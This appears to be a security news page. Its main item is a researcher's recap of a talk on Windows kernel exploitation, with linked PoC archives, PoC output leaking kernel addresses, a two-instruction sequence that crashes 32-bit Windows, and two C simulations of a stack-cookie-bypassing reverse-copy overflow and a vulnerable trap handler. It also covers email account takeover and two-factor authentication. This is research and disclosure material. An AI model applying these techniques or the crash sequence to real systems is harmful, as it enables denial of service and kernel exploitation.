Hacking & Security
If you have any expectations about the privacy of your Skype communications, you may want to reassess them. Microsoft appears to be peeking into Skype messages for security reasons, according to Ars Technica.
The owner of Skype regularly scans the contents of messages sent on the service for signs of fraud, but what's done with the information from those scans -- whether it's stored indefinitely or destroyed -- is unknown.
The first edition of the NoSuchCon security conference held in Paris ended just a few days ago. Before anything else, I would like to thank all of the organizers (proudly listed at nosuchcon.org) for making the event such a blast! The location, venue and speaker line-up were all amazing, with lots of free beer and a wealth of people to chat with. Overall, I am very happy to have shown up there and I will definitely make sure to attend the second edition of the conference.
Other than drinking, discussing 0-days and visiting Paris, I also had the pleasure to give a talk about the usual subject – Windows kernel security. The exact title of my presentation was “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions“, and it touched on several different exploitation techniques, internal CPU-related behavior and security vulnerabilities (all related to the Windows operating system) that I discovered over the last several weeks / months.
While the slide deck was made available to the attendees right at the beginning of my talk at nosuchcon.org/talks (great idea!), I’m reposting them here anyway, in case you haven’t had a chance to take a look yet. In fact, a majority of the talks were interesting and highly technical, so be sure to check the available material for all presentations ;-)
Slides: “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions” (3.3MB, PDF)
KiTrap0e advisory: “Abusing Windows NT #PF Trap Handler to Bugcheck and Leak Information”
I originally planned to address six separate topics, but due to time constraints I decided to skip some of them in favor of the other ones. A brief description of each technique and vulnerability follows below.
- “nt!memcpy (and the like) reverse copying order” – certain implementations of memcpy, memmove, RtlCopyMemory and RtlMoveMemory, found in the kernel and third-party drivers alike, handle the “overlapping regions” corner case by reversing the copy direction from the intuitive left-to-right to right-to-left. Because the function then starts writing at the end of the destination region, certain buffer overflow vulnerabilities become easier to exploit: the overflow can be turned into a (relative) write-what-where condition.
While the technique works best for a kernel ← user copy on 64-bit platforms, it can also be applied to a number of other scenarios. For more information, please refer to the “Memory Copy Functions in Local Windows Kernel Exploitation” article published last year in the Hack in the Box Magazine, Issue 009. The Proof of Concept source code of a vulnerable device driver and the exploit used during the live demonstration can be found at memcpy_ioctl.zip (3.9kB, ZIP). Note that the code has only been confirmed to be susceptible to a stack cookie bypass when built with WDK 7600.16385.1 for Windows 7 (x64 Free Build), although it should generally work for any 64-bit target.
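A user-mode model of the write-order effect, added here as an illustration; it is not the memcpy_ioctl PoC and does not reproduce the WDK driver, the 64-bit address layout or the way the overlap condition is reached against a real kernel. The flat address space, the unmapped window that stands in for a page fault, the stack layout (64-byte buffer at 0xb00, cookie at 0xb40, an 8-byte pointer slot at 0xdf8) and the two source-buffer positions are all assumptions of the example. What it shows is the part that matters for exploitation: once the runtime decides to copy right-to-left, an attacker-chosen length n makes the very first bytes land at dst + n - 1, so a far slot receives attacker bytes while a fault part-way through leaves the cookie and the buffer itself untouched; the same overflow copied left-to-right smashes the cookie and never reaches the slot.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed flat address space: SPACE bytes, with one unmapped window
 * [HOLE_START, HOLE_END) that stands in for a page fault during the copy. */
#define SPACE      0x1000
#define HOLE_START 0xc80
#define HOLE_END   0xd00

static unsigned char mem[SPACE];

static bool mapped(size_t a)
{
    return a < SPACE && !(a >= HOLE_START && a < HOLE_END);
}

/* memmove of the shape the talk describes: if dst sits inside [src, src + n)
 * the copy runs right-to-left so the not-yet-copied source is not clobbered.
 * Copies byte by byte, stops at the first unmapped address (the "fault") and
 * returns how many bytes landed before that. */
size_t sim_memmove(size_t dst, size_t src, size_t n)
{
    size_t done = 0;
    if (dst > src && dst < src + n) {
        for (size_t i = n; i-- > 0;) {          /* right-to-left */
            if (!mapped(src + i) || !mapped(dst + i))
                break;
            mem[dst + i] = mem[src + i];
            done++;
        }
    } else {
        for (size_t i = 0; i < n; i++) {        /* left-to-right */
            if (!mapped(src + i) || !mapped(dst + i))
                break;
            mem[dst + i] = mem[src + i];
            done++;
        }
    }
    return done;
}

/* Assumed "kernel stack" layout of the vulnerable driver in the model. */
#define KBUF   0xb00   /* 64-byte destination buffer */
#define COOKIE 0xb40   /* stack cookie right after it */
#define TARGET 0xdf8   /* 8-byte pointer slot the attacker wants to own */
#define FILL   0x300   /* bytes of attacker-controlled data in the source */

static const uint64_t PTR = 0xdeadbeefcafef00dULL;   /* value to plant */

/* Place attacker data at `src`, plant PTR at the offset that lands on TARGET
 * once copying starts at KBUF, set the cookie, then run the overflow. */
static size_t setup_and_copy(size_t src, size_t n)
{
    memset(mem, 0, sizeof mem);
    memset(mem + src, 0x41, FILL);
    for (int k = 0; k < 8; k++)
        mem[src + (TARGET - KBUF) + k] = (unsigned char)(PTR >> (8 * k));
    mem[COOKIE] = 0x5a;
    return sim_memmove(KBUF, src, n);
}

size_t overflow_copied(size_t src, size_t n) { return setup_and_copy(src, n); }

bool cookie_survives(size_t src, size_t n)
{
    setup_and_copy(src, n);
    return mem[COOKIE] == 0x5a;
}

uint64_t target_after(size_t src, size_t n)
{
    setup_and_copy(src, n);
    uint64_t v = 0;
    for (int k = 7; k >= 0; k--)
        v = (v << 8) | mem[TARGET + k];
    return v;
}

int main(void)
{
    /* n reaches one byte past TARGET; with src = 0x800 that makes
     * src + n = 0xb01 > KBUF, which flips the runtime into reverse mode. */
    size_t n = TARGET + 8 - KBUF + 1;
    size_t srcs[2] = { 0x400, 0x800 };
    for (int i = 0; i < 2; i++)
        printf("src=%#zx: copied %zu, cookie %s, target %016" PRIx64 "\n",
               srcs[i], overflow_copied(srcs[i], n),
               cookie_survives(srcs[i], n) ? "intact" : "smashed",
               target_after(srcs[i], n));
    return 0;
}
```

With the non-overlapping source the copy writes 0x180 bytes upward, clobbers the cookie at 0xb40 and faults in the hole before the slot; with the overlapping source it writes 0x101 bytes downward from 0xe00, fills the slot with PTR and faults at 0xcff, never touching the cookie or the buffer.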
- “nt!memcmp double-fetch” – an interesting behavior found in the Windows 8 32-bit implementation of the nt!memcmp standard function, making it possible to fake matching regions when a user-mode pointer is passed as one of the function’s parameters. Due to lack of time, this was not covered at NSC; however, our SyScan’13 slides and paper explain the problem thoroughly.
- “PAGE_GUARD and kernel code execution flow” – a technique already described in the “Fun facts: Windows kernel and guard pages” and “A story of win32k!cCapString, or unicode strings gone bad.” blog posts.
- “SegSs, LDT_ENTRY.HighWord.Bits.Default_Big and IRETD” – due to how the “Big” LDT entry flag in the SS segment descriptor is handled by the IRETD instruction used for cross-privilege-level transfers in Windows, it is possible to have the CPU disclose the upper 16 bits of the current thread’s kernel stack pointer in 32-bit versions of Windows.
Proof of Concept source code: small_seg.zip (1kB, ZIP).
Example output:
Z:\>smallseg.exe
[+] High word of kernel stack address: 94070000
Z:\>smallseg.exe
[+] High word of kernel stack address: 94010000
Z:\>smallseg.exe
[+] High word of kernel stack address: 956b0000
- “Windows 32-bit Trap Handlers” – the lack of proper sanitization of the previous CPL inside several trap handlers used in 32-bit Windows can be leveraged to disclose addresses of several internal ntoskrnl.exe (or equivalent) symbols in the kernel address space, effectively defeating kernel ASLR (not that it matters much for this particular OS).
Proof of Concept source code: kitrap01.zip (1.3kB, ZIP) and kitrap0e_addr.zip (1.4kB, ZIP).
Example outputs:
Z:\>kitrap01.exe
[+] Kernel image base: 8320c000, size: 413000
[+] Iteration 3d000 / 413000
[+] nt!KiFastCallEntry address: 83249790
Z:\>kitrap0e.exe
[+] Kernel image base: 8320c000, size: 413000
[+] Iteration 3d000 / 413000
[+] Leaked address: 8324984c
[+] Leaked address: 83249887
[+] Iteration 41000 / 413000
[+] Leaked address: 8324d4ed
[+] Iteration 412000 / 413000
- “Crashing Windows and leaking bits” – the primary focus area of the talk. As it turns out, the nt!KiTrap0e #PF trap handler trusts the KTRAP_FRAME.Ebp field to be a valid kernel-mode pointer when processing faults occurring at specific, magic Eip values. Again, due to the lack of proper KTRAP_FRAME.SegCs sanitization, it is possible to craft a frame with a controlled Eip and a user-controlled Ebp register, allowing a local attacker to crash the system via an invalid memory reference, or otherwise disclose the least significant bit of any byte in the kernel address space. The two instructions capable of crashing all 32-bit Windows NT-family systems as of today are as follows:
xor ebp, ebp
jmp 0x8327d1b7
where 0x8327d1b7 is the nt!KiSystemServiceAccessTeb address.
Proof of Concept source code: kitrap0e_bsod.zip (0.5kB, ZIP), kitrap0e_leak_bits.zip (1.4kB, ZIP) and kitrap0e_addr_space.zip (1.5kB, ZIP). The programs unconditionally crash the operating system, allow disclosing specific bits of the kernel memory and scan the kernel address space layout, respectively.
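A model of the trap-handler bug class behind the last two items, added here as an illustration; it is not the kitrap0e PoC code and cannot crash anything. It shows a #PF handler that special-cases faults at a known kernel Eip and trusts the frame's Ebp as a kernel pointer, next to a hardened version that first checks the RPL of the saved SegCs. The trap-frame subset, the address-range stand-in for "valid kernel pointer", the selectors 0x08 and 0x1b and the two fixture frames are assumptions of the example; the magic address is the one quoted above and is specific to that kernel build.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Subset of the 32-bit nt!_KTRAP_FRAME the model needs (assumed layout). */
struct trap_frame {
    uint32_t ebp;     /* Ebp at the time of the fault */
    uint32_t eip;     /* faulting Eip */
    uint16_t seg_cs;  /* CS selector; low two bits = RPL = previous CPL */
};

enum pf_result {
    PF_HANDLED,     /* the kernel's own special-cased fault was fixed up */
    PF_USER_FAULT,  /* raised as an access violation in the process */
    PF_BUGCHECK     /* invalid kernel-mode memory reference: blue screen */
};

#define MAGIC_EIP    0x8327d1b7u  /* nt!KiSystemServiceAccessTeb in the talk's build */
#define KERNEL_BASE  0x80000000u  /* model: everything above this is kernel */
#define KGDT_R0_CODE 0x08
#define KGDT_R3_CODE 0x1b         /* 0x18 | RPL 3 */

static bool from_user(const struct trap_frame *f) { return (f->seg_cs & 3) == 3; }

/* Stand-in for "this Ebp is a valid kernel-mode pointer". In the real handler
 * the dereference simply happens; a non-kernel address there is the fatal
 * page fault the two user-mode instructions provoke. */
static bool valid_kernel_ptr(uint32_t p) { return p >= KERNEL_BASE; }

/* Vulnerable shape: the Eip comparison alone selects the special case, so a
 * user thread that jumps to MAGIC_EIP reaches it with an Ebp it chose. */
enum pf_result kitrap0e_vulnerable(const struct trap_frame *f)
{
    if (f->eip == MAGIC_EIP)
        return valid_kernel_ptr(f->ebp) ? PF_HANDLED : PF_BUGCHECK;
    return from_user(f) ? PF_USER_FAULT : PF_BUGCHECK;
}

/* Hardened shape: the special case is reachable only when the fault came
 * from ring 0, so a user-mode frame never has its Ebp used as a pointer. */
enum pf_result kitrap0e_hardened(const struct trap_frame *f)
{
    if (from_user(f))
        return PF_USER_FAULT;
    if (f->eip == MAGIC_EIP)
        return valid_kernel_ptr(f->ebp) ? PF_HANDLED : PF_BUGCHECK;
    return PF_BUGCHECK;
}

typedef enum pf_result (*pf_handler)(const struct trap_frame *);

/* Frame left by "xor ebp, ebp / jmp 0x8327d1b7" executed in user mode: the
 * jump faults on the supervisor page, so the CPU reports Eip = MAGIC_EIP
 * together with a user CS and the zeroed Ebp. */
enum pf_result two_instruction_attack(pf_handler h)
{
    struct trap_frame f = { .ebp = 0, .eip = MAGIC_EIP, .seg_cs = KGDT_R3_CODE };
    return h(&f);
}

/* Legitimate case: kernel code faulted at MAGIC_EIP with a sane kernel Ebp
 * (the Ebp value is constructed for the model). */
enum pf_result kernel_teb_access_fault(pf_handler h)
{
    struct trap_frame f = { .ebp = 0x9a0b7c00u, .eip = MAGIC_EIP, .seg_cs = KGDT_R0_CODE };
    return h(&f);
}

int main(void)
{
    static const char *name[] = { "handled", "user fault", "bugcheck" };
    printf("vulnerable: attack -> %s, kernel -> %s\n",
           name[two_instruction_attack(kitrap0e_vulnerable)],
           name[kernel_teb_access_fault(kitrap0e_vulnerable)]);
    printf("hardened:   attack -> %s, kernel -> %s\n",
           name[two_instruction_attack(kitrap0e_hardened)],
           name[kernel_teb_access_fault(kitrap0e_hardened)]);
    return 0;
}
```

The check that matters is the order: the hardened handler classifies the frame by its previous privilege level before it compares Eip against any magic value, so nothing taken from a user-mode frame is ever dereferenced as a kernel pointer, while the kernel's own special case still works.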
ISC StormCast for Wednesday, May 22nd 2013 http://isc.sans.edu/podcastdetail.html?id=3323, (Wed, May 22nd)
I find it sad that in times when people are facing disaster, many have died, others missing, a ...(more)...
Having control over an email account can confer a lot of power, even though most people would probably say they do not care if someone else is reading their private emails. But it is not always about reading those private emails. Of course there have been quite a few attacks where secrets were revealed by snooping through the emails of hacked accounts. The motives range from jealous spouses searching for proof of a suspected affair to corporate espionage in which one party seeks essential information about a critical deal. Other attackers may use the compromised account to send social engineering messages to all the contacts stored in it, posing as the person whose account has been hacked.
Nowadays an email account is much more than just sending and receiving emails. Many free service providers like Microsoft or Google have various additional services attached to email accounts. Having access to these accounts means having access to such things as private photos that were uploaded to the account. There have been a few cases where attackers broke into email accounts and found sensitive pictures, like naked photos, and then blackmailed the owner of the account. While most people are smart enough not to upload such pictures, with the integrated cloud storage that is available with many services now there may be all kinds of files stored in those accounts, such as password files, license files, tax records, passport scans, company documents, and more.
The reach of an email account is larger still. Many online services use the email address as the user name, so knowing the email address and the email account password can give the attacker access to many accounts besides the email provider: most services offer to reset a forgotten password through email, so it does not matter whether the user reuses the password elsewhere. Controlling the email account means controlling the password reset emails of other services, and therefore gaining access to those services regardless of what password each of them uses.
Every time there is a data breach and email and passwords are publicly posted, other attackers will take this information and start new attacks with it. The first thing they usually try is to check whether the same password also accesses the email account.
Of course, not all services are of interest to attackers. Losing control of your social media account may not be enjoyable—especially if you are a news agency—but it will not really hurt most people. For companies this might be a different story, as it could lead to brand damage if something happens to their accounts. Last year there was the widely publicized situation of Mat Honan, a Wired reporter whose Apple devices were wiped when hackers gained access to his iCloud account. This can be troublesome, but as a user you can help to avoid it by registering for the additional security measures provided.
Other services are very much of interest to attackers. Retail sites, for instance, let goods and services be ordered against the credit card on file or invoiced to the account owner. Financial services, auctions, and payment services are definitely high on the list of services that hackers would check. There are many services that you probably do not want to lose control over, and with companies adding more and more features it is even more important to protect your email account. For example, Google recently announced the integration of Google Wallet into Gmail. This lets you send money from your email account in the same way you attach a picture to an email: you can attach money to an email as well. Or an attacker might do it for you.
To counter such attacks, Google was one of the first service providers to bring two-factor authentication to the masses. Other services, including Apple, have followed and have started to integrate two-factor or out-of-band authentication, in the form of a code sent to a previously registered mobile phone or a one-time password (OTP) generator application. This is a good way to secure your account beyond a password, and it is definitely better than only asking the user to fill out security questions whose answers can easily be guessed from public information.
Not proactively enrolling in additional authentication measures, where they are available, can also leave you exposed to the rare attack for which a password is not even required: there is always a chance of a glitch, like the one in Apple’s password reset function in 2013. While Apple acted quickly and fixed the issue, users who had enrolled in two-step verification were protected the entire time. There have also been cases where an attacker could use a cross-site request forgery (CSRF) attack to ride an active session and reconfigure your email account. For example, a long time ago there was a simple attack in which a website could add a forwarding filter to your Gmail account, resulting in all emails being forwarded to an additional address. Google fixed this issue quickly and has since increased account security further; for example, the user is now warned with a UI message when a new filter has been added. Such attacks are harder for the user to prevent, as logging out of the account whenever it is not in use is rarely practical advice.
You should use a strong password for your main email account that is unique and different from the passwords you use for other services. Also keep yourself aware of new security features introduced by your email provider.
Chrome 27 stable released http://googlechromereleases.blogspot.ca/ some security fixes, (Tue, May 21st)